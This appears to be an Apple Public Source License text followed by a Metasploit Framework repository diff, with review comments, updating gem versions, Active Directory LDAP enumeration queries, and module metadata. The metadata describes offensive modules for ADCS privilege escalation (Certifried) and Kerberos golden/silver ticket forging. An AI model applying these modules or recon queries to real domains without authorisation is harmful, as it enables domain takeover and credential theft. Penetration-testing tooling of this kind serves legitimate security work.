1.5 "Larger Work" means a work which combines Covered Code or portions
thereof with code not governed by the terms of this License.
1.6 "Modifications" mean any addition to, deletion from, and/or change
to, the substance and/or structure of the Original Code, any previous
Modifications, the combination of Original Code and any previous
Modifications, and/or any respective portions thereof. When code is
released as a series of files, a Modification is: (a) any addition to
or deletion from the contents of a file containing Covered Code;
and/or (b) any new file or other representation of computer program
statements that contains any part of Covered Code.
1.7 "Original Code" means (a) the Source Code of a program or other
work as originally made available by Apple under this License,
including the Source Code of any updates or upgrades to such programs
or works made available by Apple under this License, and that has been
expressly identified by Apple as such in the header file(s) of such
work; and (b) the object code compiled from such Source Code and
originally made available by Apple under this License.
1.8 "Source Code" means the human readable form of a program or other
work that is suitable for making modifications to it, including all
modules it contains, plus any associated interface definition files,
scripts used to control compilation and installation of an executable
(object code).
1.9 "You" or "Your" means an individual or a legal entity exercising
rights under this License. For legal entities, "You" or "Your"
includes any entity which controls, is controlled by, or is under
common control with, You, where "control" means (a) the power, direct
or indirect, to cause the direction or management of such entity,
whether by contract or otherwise, or (b) ownership of fifty percent
(50%) or more of the outstanding shares or beneficial ownership of
such entity.
2. Permitted Uses; Conditions & Restrictions. Subject to the terms
and conditions of this License, Apple hereby grants You, effective on
the date You accept this License and download the Original Code, a
world-wide, royalty-free, non-exclusive license, to the extent of
Apple's Applicable Patent Rights and copyrights covering the Original
Code, to do the following:
2.1 Unmodified Code. You may use, reproduce, display, perform,
internally distribute within Your organization, and Externally Deploy
verbatim, unmodified copies of the Original Code, for commercial or
non-commercial purposes, provided that in each instance:
(a) You must retain and reproduce in all copies of Original Code the
copyright and other proprietary notices and disclaimers of Apple as
they appear in the Original Code, and keep intact all notices in the
Original Code that refer to this License; and
(b) You must include a copy of this License with every copy of Source
Code of Covered Code and documentation You distribute or Externally
Deploy, and You may not offer or impose any terms on such Source Code
that alter or restrict this License or the recipients' rights
hereunder, except as permitted under Section 6.
2.2 Modified Code. You may modify Covered Code and use, reproduce,
display, perform, internally distribute within Your organization, and
Externally Deploy Your Modifications and Covered Code, for commercial
or non-commercial purposes, provided that in each instance You also
meet all of these conditions:
(a) You must satisfy all the conditions of Section 2.1 with respect to
the Source Code of the Covered Code;
(b) You must duplicate, to the extent it does not already exist, the
notice in Exhibit A in each file of the Source Code of all Your
Modifications, and cause the modified files to carry prominent notices
stating that You changed the files and the date of any change; and
(c) If You Externally Deploy Your Modifications, You must make
Source Code of all Your Externally Deployed Modifications either
available to those to whom You have Externally Deployed Your
Modifications, or publicly available. Source Code of Your Externally
Deployed Modifications must be released under the terms set forth in
this License, including the license grants set forth in Section 3
below, for as long as you Externally Deploy the Covered Code or twelve
(12) months from the date of initial External Deployment, whichever is
longer. You should preferably distribute the Source Code of Your
Externally Deployed Modifications electronically (e.g. download from a
web site).
2.3 Distribution of Executable Versions. In addition, if You
Externally Deploy Covered Code (Original Code and/or Modifications) in
object code, executable form only, You must include a prominent
notice, in the code itself as well as in related documentation,
stating that Source Code of the Covered Code is available under the
terms of this License with information on how and where to obtain such
Source Code.
2.4 Third Party Rights. You expressly acknowledge and agree that
although Apple and each Contributor grants the licenses to their
respective portions of the Covered Code set forth herein, no
assurances are provided by Apple or any Contributor that the Covered
Code does not infringe the patent or other intellectual property
rights of any other entity. Apple and each Contributor disclaim any
liability to You for claims brought by any other entity based on
infringement of intellectual property rights or otherwise. As a
condition to exercising the rights and licenses granted hereunder, You
hereby assume sole responsibility to secure any other intellectual
property rights needed, if any. For example, if a third party patent
license is required to allow You to distribute the Covered Code, it is
Your responsibility to acquire that license before distributing the
Covered Code.
3. Your Grants. In consideration of, and as a condition to, the
licenses granted to You under this License, You hereby grant to any
person or entity receiving or distributing Covered Code under this
License a non-exclusive, royalty-free, perpetual, irrevocable license,
under Your Applicable Patent Rights and other intellectual property
rights (other than patent) owned or controlled by You, to use,
reproduce, display, perform, modify, sublicense, distribute and
Externally Deploy Your Modifications of the same scope and extent as
Apple's licenses under Sections 2.1 and 2.2 above.
4. Larger Works. You may create a Larger Work by combining Covered
Code with other code not governed by the terms of this License and
distribute the Larger Work as a single product. In each such instance,
You must make sure the requirements of this License are fulfilled for
the Covered Code or any portion thereof.
5. Limitations on Patent License. Except as expressly stated in
Section 2, no other patent rights, express or implied, are granted by
Apple herein. Modifications and/or Larger Works may require additional
patent licenses from Apple which Apple may grant in its sole
discretion.
6. Additional Terms. You may choose to offer, and to charge a fee for,
warranty, support, indemnity or liability obligations and/or other
rights consistent with the scope of the license granted herein
("Additional Terms") to one or more recipients of Covered Code.
However, You may do so only on Your own behalf and as Your sole
responsibility, and not on behalf of Apple or any Contributor. You
must obtain the recipient's agreement that any such Additional Terms
are offered by You alone, and You hereby agree to indemnify, defend
and hold Apple and every Contributor harmless for any liability
incurred by or claims asserted against Apple or such Contributor by
reason of any such Additional Terms.
7. Versions of the License. Apple may publish revised and/or new
versions of this License from time to time. Each version will be given
a distinguishing version number. Once Original Code has been published
under a particular version of this License, You may continue to use it
under the terms of that version. You may also choose to use such
Original Code under the terms of any subsequent version of this
License published by Apple. No one other than Apple has the right to
modify the terms applicable to Covered Code created under this
License.
8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
part pre-release, untested, or not fully tested works. The Covered
Code may contain errors that could cause failures or loss of data, and
may be incomplete or contain inaccuracies. You expressly acknowledge
and agree that use of the Covered Code, or any portion thereof, is at
Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
You acknowledge that the Covered Code is not intended for use in the
operation of nuclear facilities, aircraft navigation, communication
systems, or air traffic control machines in which case the failure of
the Covered Code could lead to death, personal injury, or severe
physical or environmental damage.
9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
TO YOU. In no event shall Apple's total liability to You for all
damages (other than as may be required by applicable law) under this
License exceed the amount of fifty dollars ($50.00).
10. Trademarks. This License does not grant any rights to use the
trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
"QuickTime", "QuickTime Streaming Server" or any other trademarks,
service marks, logos or trade names belonging to Apple (collectively
"Apple Marks") or to any trademark, service mark, logo or trade name
belonging to any Contributor. You agree not to use any Apple Marks in
or as part of the name of products derived from the Original Code or
to endorse or promote products derived from the Original Code other
than as expressly permitted by and in strict compliance at all times
with Apple's third party trademark usage guidelines which are posted
at http://www.apple.com/legal/guidelinesfor3rdparties.html.
11. Ownership. Subject to the licenses granted under this License,
each Contributor retains all rights, title and interest in and to any
Modifications made by such Contributor. Apple retains all rights,
title and interest in and to the Original Code and any Modifications
made by or on behalf of Apple ("Apple Modifications"), and such Apple
Modifications will not be automatically subject to this License. Apple
may, at its sole discretion, choose to license such Apple
Modifications under this License, or on different terms from those
contained in this License or may choose not to license them at all.
12. Termination.
12.1 Termination. This License and the rights granted hereunder will
terminate:
(a) automatically without notice from Apple if You fail to comply with
any term(s) of this License and fail to cure such breach within 30
days of becoming aware of such breach;
(b) immediately in the event of the circumstances described in Section
13.5(b); or
(c) automatically without notice from Apple if You, at any time during
the term of this License, commence an action for patent infringement
against Apple; provided that Apple did not first commence
an action for patent infringement against You in that instance.
12.2 Effect of Termination. Upon termination, You agree to immediately
stop any further use, reproduction, modification, sublicensing and
distribution of the Covered Code. All sublicenses to the Covered Code
which have been properly granted prior to termination shall survive
any termination of this License. Provisions which, by their nature,
should remain in effect beyond the termination of this License shall
survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
12.2 and 13. No party will be liable to any other for compensation,
indemnity or damages of any sort solely as a result of terminating
this License in accordance with its terms, and termination of this
License will be without prejudice to any other right or remedy of
any party.
13. Miscellaneous.
13.1 Government End Users. The Covered Code is a "commercial item" as
defined in FAR 2.101. Government software and technical data rights in
the Covered Code include only those rights customarily provided to the
public as defined in this License. This customary commercial license
in technical data and software is provided in accordance with FAR
12.211 (Technical Data) and 12.212 (Computer Software) and, for
Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
Commercial Items) and 227.7202-3 (Rights in Commercial Computer
Software or Computer Software Documentation). Accordingly, all U.S.
Government End Users acquire Covered Code with only those rights set
forth herein.
13.2 Relationship of Parties. This License will not be construed as
creating an agency, partnership, joint venture or any other form of
legal association between or among You, Apple or any Contributor, and
You will not represent to the contrary, whether expressly, by
implication, appearance or otherwise.
13.3 Independent Development. Nothing in this License will impair
Apple's right to acquire, license, develop, have others develop for
it, market and/or distribute technology or products that perform the
same or similar functions as, or otherwise compete with,
Modifications, Larger Works, technology or products that You may
develop, produce, market or distribute.
13.4 Waiver; Construction. Failure by Apple or any Contributor to
enforce any provision of this License will not be deemed a waiver of
future enforcement of that or any other provision. Any law or
regulation which provides that the language of a contract shall be
construed against the drafter will not apply to this License.
13.5 Severability. (a) If for any reason a court of competent
jurisdiction finds any provision of this License, or portion thereof,
to be unenforceable, that provision of the License will be enforced to
the maximum extent permissible so as to effect the economic benefits
and intent of the parties, and the remainder of this License will
continue in full force and effect. (b) Notwithstanding the foregoing,
if applicable law prohibits or restricts You from fully and/or
specifically complying with Sections 2 and/or 3 or prevents the
enforceability of either of those Sections, this License will
immediately terminate and You must immediately discontinue any use of
the Covered Code and destroy all copies of it that are in your
possession or control.
13.6 Dispute Resolution. Any litigation or other dispute resolution
between You and Apple relating to this License shall take place in the
Northern District of California, and You and Apple hereby consent to
the personal jurisdiction of, and venue in, the state and federal
courts within that District with respect to this License. The
application of the United Nations Convention on Contracts for the
International Sale of Goods is expressly excluded.
13.7 Entire Agreement; Governing Law. This License constitutes the
entire agreement between the parties with respect to the subject
matter hereof. This License shall be governed by the laws of the
United States and the State of California, except that body of
California law concerning conflicts of law.
Where You are located in the province of Quebec, Canada, the following
clause applies: The parties hereby confirm that they have requested
that this License and all related documents be drafted in English. Les
parties ont exige que le present contrat et tous les documents
connexes soient rediges en anglais.
EXHIBIT A.
"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
Reserved.
This file contains Original Code and/or Modifications of Original Code
as defined in and that are subject to the Apple Public Source License
Version 2.0 (the 'License'). You may not use this file except in
compliance with the License. Please obtain a copy of the License at
http://www.opensource.apple.com/apsl/ and read it before using this
file.
The Original Code and all software distributed under the License are
distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
Please see the License for the specific language governing rights and
limitations under the License."
+16 -14
@@ -1,10 +1,10 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.1.0, MIT
actionpack, 6.1.7, MIT
actionview, 6.1.7, MIT
activemodel, 6.1.7, MIT
activerecord, 6.1.7, MIT
activesupport, 6.1.7, MIT
actionpack, 7.0.4.1, MIT
actionview, 7.0.4.1, MIT
activemodel, 7.0.4.1, MIT
activerecord, 7.0.4.1, MIT
activesupport, 7.0.4.1, MIT
addressable, 2.8.1, "Apache 2.0"
afm, 0.2.2, MIT
arel-helpers, 2.14.0, MIT
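Review bot: the header line says this list is produced by tools/dev/update_gem_licenses.sh; confirm the actionpack/actionview/activemodel/activerecord/activesupport move from 6.1.7 to 7.0.4.1 came from re-running that script against the updated Gemfile.lock rather than a hand edit, so the license list and the lockfile cannot drift apart.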
@@ -68,12 +68,12 @@ logging, 2.3.1, MIT
loofah, 2.19.1, MIT
memory_profiler, 1.0.1, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 4.0.5, "New BSD"
metasploit-concern, 5.0.0, "New BSD"
metasploit-credential, 6.0.1, "New BSD"
metasploit-framework, 6.2.37, "New BSD"
metasploit-model, 4.0.6, "New BSD"
metasploit-framework, 6.3.1, "New BSD"
metasploit-model, 5.0.0, "New BSD"
metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
metasploit_data_models, 5.0.6, "New BSD"
metasploit_data_models, 6.0.1, "New BSD"
metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mini_portile2, 2.8.1, MIT
@@ -113,9 +113,10 @@ rack-protection, 3.0.5, MIT
rack-test, 2.0.2, MIT
rails-dom-testing, 2.0.3, MIT
rails-html-sanitizer, 1.4.4, MIT
railties, 6.1.7, MIT
railties, 7.0.4.1, MIT
rainbow, 3.1.1, MIT
rake, 13.0.6, MIT
rasn1, 0.12.0, MIT
rb-readline, 0.5.5, BSD
recog, 3.0.3, unknown
redcarpet, 3.5.1, MIT
@@ -123,7 +124,7 @@ regexp_parser, 2.6.1, MIT
reline, 0.3.2, ruby
rex-arch, 0.1.14, "New BSD"
rex-bin_tools, 0.1.8, "New BSD"
rex-core, 0.1.28, "New BSD"
rex-core, 0.1.29, "New BSD"
rex-encoder, 0.1.6, "New BSD"
rex-exploitation, 0.1.36, "New BSD"
rex-java, 0.1.6, "New BSD"
@@ -134,7 +135,7 @@ rex-powershell, 0.1.97, "New BSD"
rex-random_identifier, 0.1.9, "New BSD"
rex-registry, 0.1.4, "New BSD"
rex-rop_builder, 0.1.4, "New BSD"
rex-socket, 0.1.43, "New BSD"
rex-socket, 0.1.45, "New BSD"
rex-sslscan, 0.1.8, "New BSD"
rex-struct2, 0.1.3, "New BSD"
rex-text, 0.2.47, "New BSD"
@@ -155,7 +156,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
ruby-progressbar, 1.11.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.2.1, "New BSD"
ruby_smb, 3.2.4, "New BSD"
rubyntlm, 0.6.3, MIT
rubyzip, 2.3.2, "Simplified BSD"
sawyer, 0.9.2, MIT
@@ -165,6 +166,7 @@ simpleidn, 0.2.1, MIT
sinatra, 3.0.5, MIT
sqlite3, 1.5.4, "New BSD"
sshkey, 2.0.0, MIT
strptime, 0.2.5, "Simplified BSD"
swagger-blocks, 3.0.0, MIT
thin, 1.8.1, "GPL-2.0+, ruby"
thor, 1.2.1, MIT
@@ -183,7 +185,7 @@ webrick, 1.7.0, "ruby, Simplified BSD"
websocket-driver, 0.7.5, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
win32api, 0.1.0, unknown
windows_error, 0.1.4, BSD
windows_error, 0.1.5, BSD
winrm, 2.3.6, "Apache 2.0"
xdr, 3.0.3, "Apache 2.0"
xmlrpc, 0.3.2, "ruby, Simplified BSD"
@@ -9,6 +9,7 @@ queries:
- description
- displayName
- sAMAccountName
- objectSID
- userPrincipalName
- userAccountControl
- homeDirectory
@@ -92,12 +93,14 @@ queries:
filter: '(|(objectCategory=computer)(objectClass=computer))'
attributes:
- dn
- name
- description
- displayName
- sAMAccountName
- objectSID
- distinguishedName
- dNSHostName
- description
- givenName
- name
- operatingSystem
- operatingSystemVersion
- operatingSystemServicePack
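Review bot: the reordered attribute list for the computer query still carries givenName, a user-object attribute that is not populated on computer accounts and only adds an empty column to the output; drop it while this list is being reworked.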
@@ -140,6 +143,18 @@ queries:
- distinguishedName
references:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
- action: ENUM_DOMAIN
description: 'Dump info about the Active Directory domain.'
filter: '(objectClass=domain)'
attributes:
- ms-DS-MachineAccountQuota
- objectSID
- name
- lockoutduration
- lockoutthreshold
- minpwdage
- maxpwdage
- minpwdlength
- action: ENUM_DOMAIN_CONTROLLERS
description: 'Dump all known domain controllers.'
filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
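Review bot: lockoutduration, lockoutthreshold, minpwdage, maxpwdage and minpwdlength are all lowercased while the rest of the file uses the schema display names (ms-DS-MachineAccountQuota, objectSID). AD matches attribute names case-insensitively so the query works, but lockoutDuration, lockoutThreshold, minPwdAge, maxPwdAge and minPwdLength keep the file consistent and greppable. The new ENUM_DOMAIN action is also missing the references entry its neighbours carry.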
@@ -253,6 +268,13 @@ queries:
- dnsHostName
references:
- https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
- action: ENUM_MACHINE_ACCOUNT_QUOTA
description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
filter: '(objectClass=domain)'
attributes:
- ms-DS-MachineAccountQuota
references:
- https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
- action: ENUM_ORGROLES
description: 'Dump info about all known organization roles in the LDAP environment.'
filter: '(objectClass=organizationalRole)'
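Review bot: ENUM_MACHINE_ACCOUNT_QUOTA overlaps with the ENUM_DOMAIN action added earlier in this file: same '(objectClass=domain)' filter, and ms-DS-MachineAccountQuota is already the first attribute there. A single-attribute shortcut is fine, but say so in the description so users know ENUM_DOMAIN returns the same value.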
Binary file not shown.
Binary file not shown.
Binary file not shown.
+2 -2
@@ -15,7 +15,7 @@
<% end %>
## Module Ranking
<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>
**<%= items[:mod_rank_name] %>**
@@ -47,7 +47,7 @@
<% end %>
## Module Traits
<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>
<% unless items[:mod_side_effects].empty? %>
### Side Effects
+1 -1
@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
msf <%= mod.type %>(<%= mod.shortname %>) > generate
```
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
+848 -91
@@ -595,9 +595,9 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/dcerpc/icpr_cert": {
"name": "ICPR Certificate Management",
"fullname": "auxiliary/admin/dcerpc/icpr_cert",
"auxiliary_admin/dcerpc/cve_2022_26923_certifried": {
"name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)",
"fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried",
"aliases": [
],
@@ -606,11 +606,15 @@
"type": "auxiliary",
"author": [
"Oliver Lyak",
"Spencer McIntyre"
"CravateRouge",
"Erik Wynter",
"Christophe De La Fuente"
],
"description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.",
"description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.",
"references": [
"URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4",
"URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html",
"CVE-2022-26923"
],
"platform": "",
"arch": "",
@@ -624,7 +628,63 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-08-25 08:49:52 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/cve_2022_26923_certifried",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"Certifried"
],
"Reliability": [
"crash-safe"
],
"Stability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/dcerpc/icpr_cert": {
"name": "ICPR Certificate Management",
"fullname": "auxiliary/admin/dcerpc/icpr_cert",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Will Schroeder",
"Lee Christensen",
"Oliver Lyak",
"Spencer McIntyre"
],
"description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.",
"references": [
"URL-https://github.com/GhostPack/Certify",
"URL-https://github.com/ly4k/Certipy"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-12-02 16:29:02 +0000",
"path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/icpr_cert",
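Review bot: "crash-safe" sits under Reliability while Stability is left empty in the cve_2022_26923_certifried entry; in the framework's module-metadata definitions crash-safe is a Stability value (the get_ticket entry later in this diff lists it under Stability). This file is generated, so move the value in the module's notes hash and regenerate rather than editing the JSON.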
@@ -640,6 +700,10 @@
],
"SideEffects": [
"ioc-in-logs"
],
"AKA": [
"Certifry",
"Certipy"
]
},
"session_types": false,
@@ -674,7 +738,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-10-21 13:40:38 +0000",
"mod_time": "2022-12-02 16:29:02 +0000",
"path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/samr_computer",
@@ -5144,6 +5208,213 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/forge_ticket": {
"name": "Kerberos Silver/Golden Ticket Forging",
"fullname": "auxiliary/admin/kerberos/forge_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Benjamin Delpy",
"Dean Welch"
],
"description": "This module forges a Kerberos ticket",
"references": [
"URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-24 13:28:10 +0000",
"path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/forge_ticket",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"AKA": [
"Silver Ticket",
"Golden Ticket",
"Ticketer",
"Klist"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/get_ticket": {
"name": "Kerberos TGT/TGS Ticket Requester",
"fullname": "auxiliary/admin/kerberos/get_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christophe De La Fuente",
"Spencer McIntyre",
"Will Schroeder",
"Lee Christensen",
"Oliver Lyak",
"smashery"
],
"description": "This module requests TGT/TGS Kerberos tickets from the KDC",
"references": [
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-24 15:12:00 +0000",
"path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/get_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"getTGT",
"getST"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/inspect_ticket": {
"name": "Kerberos Ticket Inspecting",
"fullname": "auxiliary/admin/kerberos/inspect_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dean Welch"
],
"description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-26 09:21:55 +0000",
"path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/inspect_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"AKA": [
"klist"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/keytab": {
"name": "Kerberos keytab utilities",
"fullname": "auxiliary/admin/kerberos/keytab",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"alanfoster"
],
"description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-12-07 23:03:57 +0000",
"path": "/modules/auxiliary/admin/kerberos/keytab.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/keytab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
"name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
"fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
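Review bot: forge_ticket's description, "This module forges a Kerberos ticket", is too thin for a module carrying the Silver Ticket and Golden Ticket AKAs, and forge_ticket, inspect_ticket and keytab all ship with empty Stability, SideEffects and Reliability arrays. Since this JSON is regenerated from the module sources, expand the description and fill in the notes there (at least a Stability value, as get_ticket has).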
@@ -5178,7 +5449,7 @@
],
"targets": null,
"mod_time": "2022-04-08 11:35:31 +0000",
"mod_time": "2023-01-27 09:11:43 +0000",
"path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -5190,6 +5461,58 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/ticket_converter": {
"name": "Kerberos ticket converter",
"fullname": "auxiliary/admin/kerberos/ticket_converter",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Zer1t0",
"Dean Welch"
],
"description": "This module converts tickets to the ccache format from the kirbi format and vice versa.",
"references": [
"URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py",
"URL-https://tools.ietf.org/html/rfc4120",
"URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html",
"URL-https://github.com/gentilkiwi/kekeo",
"URL-https://github.com/rvazarkar/KrbCredExport"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-09-28 22:28:54 +0000",
"path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ticket_converter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/ldap/rbcd": {
"name": "Role Base Constrained Delegation",
